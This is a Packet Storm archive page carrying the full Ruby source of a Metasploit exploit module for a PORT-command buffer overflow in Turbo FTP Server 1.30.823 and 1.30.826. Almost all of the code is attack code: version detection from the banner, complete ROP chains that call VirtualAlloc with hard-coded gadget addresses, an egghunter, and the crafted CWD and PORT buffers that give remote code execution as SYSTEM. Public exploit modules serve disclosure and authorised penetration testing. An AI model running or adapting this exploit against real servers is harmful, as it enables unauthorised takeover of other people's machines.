what you don't know can hurt you

Turbo FTP Server 1.30.823 PORT Overflow

Turbo FTP Server 1.30.823 PORT Overflow
Posted Oct 22, 2012
Authored by corelanc0d3r, Lincoln, The Light Cosine, Zhao Liang | Site metasploit.com

This Metasploit module exploits a buffer overflow vulnerability found in the PORT command in Turbo FTP Server versions 1.30.823 and 1.30.826, which results in remote code execution under the context of SYSTEM.

tags | exploit, remote, overflow, code execution
advisories | OSVDB-85887
MD5 | 27e9a65c70c079a0e79f716dceac7450

Turbo FTP Server 1.30.823 PORT Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Remote::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'Turbo FTP Server 1.30.823 PORT Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability found in the PORT
command in Turbo FTP Server 1.30.823 & 1.30.826, which results in remote
code execution under the context of SYSTEM.
},
'Author' =>
[
'Zhao Liang', #Initial Descovery
'Lincoln', #Metasploit
'corelanc0d3r', #Metasploit
'thelightcosine' #Metasploit
],
'License' => MSF_LICENSE,
'Platform' => [ 'win' ],
'References' =>
[
[ 'OSVDB', '85887' ]
],
'Payload' =>
{
'BadChars' => "\x00",
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' => { 'BufferRegister' => 'EDI' }
},
'Targets' =>
[
[ 'Automatic', {} ],
['Windows Universal TurboFtp 1.30.823',
{
'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]
'ver' => 823
},

],
[ 'Windows Universal TurboFtp 1.30.826',
{
'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]
'ver' => 826
},
],
],

'DisclosureDate' => 'Oct 03 2012',
'DefaultTarget' => 0))
end

def check
connect
disconnect
if (banner =~ /1\.30\.823/)
return Exploit::CheckCode::Vulnerable
elsif (banner =~ /1\.30\.826/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end


def create_rop_chain(ver)
# rop chain generated with mona.py - www.corelan.be
if ver == 823
rop_gadgets =
[
0x004b692a, # POP ECX # RETN [tbssvc.exe]
0x005f6074, # ptr to &VirtualAlloc() [IAT tbssvc.exe]
0x0046f82a, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe]
0x00423b95, # XCHG EDX,EDI # RETN [tbssvc.exe]
0x00423a27, # XCHG ESI,EDI # RETN [tbssvc.exe]
0x005d1c99, # POP EBP # RETN [tbssvc.exe]
0x004cad5d, # & jmp esp [tbssvc.exe]
0x004ab16b, # POP EBX # RETN [tbssvc.exe]
0x00000001, # 0x00000001-> ebx
0x005ef7f6, # POP EDX # RETN [tbssvc.exe]
0x00001000, # 0x00001000-> edx
0x005d7139, # POP ECX # RETN [tbssvc.exe]
0x00000040, # 0x00000040-> ecx
0x004df1e0, # POP EDI # RETN [tbssvc.exe]
0x00411985, # RETN (ROP NOP) [tbssvc.exe]
0x00502639, # POP EAX # RETN [tbssvc.exe]
0x90909090, # nop
0x00468198, # PUSHAD # RETN [tbssvc.exe]
].flatten.pack("V*")

elsif ver == 826
rop_gadgets =
[
0x0050eae4, # POP ECX # RETN [tbssvc.exe]
0x005f7074, # ptr to &VirtualAlloc() [IAT tbssvc.exe]
0x004aa7aa, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe]
0x00496A65, # XOR EAX,EAX [tbssvc.exe]
0x004badda, # ADD EAX,EDX # RETN [tbssvc.exe]
0x00411867, # XCHG EAX,ESI # XOR EAX,EAX # POP EBX # RETN [tbssvc.exe]
0x00000001, # 0x00000001-> ebx
0x0058a27a, # POP EBP # RETN [tbssvc.exe]
0x004df7dd, # & call esp [tbssvc.exe]
0x005f07f6, # POP EDX # RETN [tbssvc.exe]
0x00001000, # 0x00001000-> edx
0x004adc08, # POP ECX # RETN [tbssvc.exe]
0x00000040, # 0x00000040-> ecx
0x00465fbe, # POP EDI # RETN [tbssvc.exe]
0x004fb207, # RETN (ROP NOP) [tbssvc.exe]
0x00465f36, # POP EAX # RETN [tbssvc.exe]
0x90909090, # nop
0x004687ff, # PUSHAD # RETN [tbssvc.exe]
].flatten.pack("V*")
end
return rop_gadgets

end

def exploit
my_target = target
if my_target.name == 'Automatic'
print_status("Automatically detecting the target")
connect
disconnect

if (banner =~ /1\.30\.823/)
my_target = targets[1]
elsif (banner =~ /1\.30\.826/)
my_target = targets[2]
end
if (not my_target)
print_status("No matching target...quiting")
return
end
target = my_target
end

print_status("Selected Target: #{my_target.name}")
connect_login

rop_chain = create_rop_chain(target['ver'])
rop = rop_chain.unpack('C*').join(',')

eggoptions =
{
:checksum => true,
:eggtag => 'w00t',
:depmethod => 'virtualalloc',
:depreg => 'esi'
}

badchars = "\x00"
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

speedupasm = "mov edx,eax\n"
speedupasm << "sub edx,0x1000\n"
speedupasm << "sub esp,0x1000"
speedup = Metasm::Shellcode.assemble(Metasm::Ia32.new, speedupasm).encode_string

fasterhunter = speedup
fasterhunter << hunter

print_status("Connecting to target #{target.name} server")

buf1 = rand_text_alpha(2012)
buf1 << egg
buf1 << rand_text_alpha(100)

buf2 = rand_text_alpha(4).unpack('C*').join(',')
buf2 << ","
buf2 << [target['Ret']].pack("V").unpack('C*').join(',') #eip
buf2 << ","
buf2 << rop
buf2 << ","
buf2 << fasterhunter.unpack('C*').join(',')
buf2 << ","
buf2 << rand_text_alpha(90).unpack('C*').join(',')

send_cmd( ['CWD', buf1], true );
send_cmd( ['PORT', buf2], true );

print_status("Egghunter deployed, locating shellcode")

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close